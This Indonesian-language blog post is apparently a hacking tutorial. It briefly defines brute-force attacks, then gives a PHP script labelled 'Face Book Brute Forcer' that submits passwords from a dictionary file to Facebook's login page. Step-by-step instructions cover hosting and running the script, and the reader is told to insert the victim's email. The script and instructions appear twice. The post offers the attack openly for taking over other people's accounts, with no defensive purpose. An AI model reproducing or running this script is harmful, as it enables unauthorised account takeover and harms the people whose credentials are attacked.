Brute force attack
dalam bahasa Indonesia disebut juga dengan Serangan brute force ini adalah sebuah teknik serangan terhadap sebuah sistem keamanan komputer yang menggunakan percobaan terhadap semua kunci password yang memungkinkan atau istilah gampangnya mungkin menggunakan Random password/ password acak. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan komputer dibandingkan kecerdasan manusia. Istilah brute force sendiri dipopulerkan oleh Kenneth Thompson, dengan mottonya:“When in doubt, use brute-force” (jika ragu, gunakan brute-force).
Teknik yang paling banyak digunakan untuk memecahkan password, kunci, kode atau kombinasi. Cara kerja metode ini sangat sederhana yaitu mencoba semua kombinasi yang memungkinkan memecahkan tembok keamanan.
oke saya tidak akan memperpanjang penjelasan lagi,sekarang mari kita lihat tutorial dari brute force tersebut
Bahan2 yg di butuhkan:
Upload 3 file berikut di web hosting kamu (usahakan yg berbayar, coz klo yg gratisan suka ga support) Cry
1.fb.php yang isinya skrip brute force
2.cookie.txt
3.dictionary.txt
Script Brute Force :
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.com"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
File cookies.txt kosongkan saja.
Oke, ada 2 cara meng-eksekusi file fb.php/skrip brute force.
1.) Menggunakan web browser. Cara ini mudah, tapi relatif lbh lama. Karna kita tau, kalau modus grafis selalu lebih lamban di banding modus text. Cara nya tinggal upload semua file2 di atas ke web hosting, lalu jalankan melalui browser. Gampang kan? tampi lambreta abisss!. Web browser favorit saya adalah Opera.
2.)Menggunakan SSH client. Cara ini lbh cepat, tapi relatif lbh sulit. Selain itu kita jg harus punya web hosting sendiri, coz web hosting gratisan biasa-nya tidak akan memberi hak SSH pada kita Tolong. Cara-nya kita harus meng-eksekusi skrip via SSH client/console yg sudah terkoneksi ke server kita. SSH client favorit saya adalah Putty.
Ingat, tidak semua FB bisa di crack dng cara ini... semua tergantung database dari Dictionary.txt jg dari tinggkat kerumitan Password.
So...
inti-nya cuma satu... SABAR...
Ok selamat mencoba yah....
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.com"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
edit bagian ini $username ="brute@force.com";
ganti dgn email korban
File dictionary.txt nya bisa kamu bikin sendiri, atau ngambil dari yg udh ada. Kalo malas bikin,
ambil di sini danTinggal buang bagian md5-nya.
Oke, ada 2 cara meng-eksekusi file fb.php/skrip brute force.
1.) Menggunakan web browser. Cara ini mudah, tapi relatif lbh lama. Karna kita tau, kalau modus grafis selalu lebih lamban di banding modus text. Cara nya tinggal upload semua file2 di atas ke web hosting, lalu jalankan melalui browser. Gampang kan? tampi lambreta abisss!. Web browser favorit saya adalah Opera.
2.)Menggunakan SSH client. Cara ini lbh cepat, tapi relatif lbh sulit. Selain itu kita jg harus punya web hosting sendiri, coz web hosting gratisan biasa-nya tidak akan memberi hak SSH pada kita Tolong. Cara-nya kita harus meng-eksekusi skrip via SSH client/console yg sudah terkoneksi ke server kita. SSH client favorit saya adalah Putty.
Ingat, tidak semua FB bisa di crack dng cara ini... semua tergantung database dari Dictionary.txt jg dari tinggkat kerumitan Password.
So...
inti-nya cuma satu... SABAR...
Ok selamat mencoba yah....
0 komentar:
Posting Komentar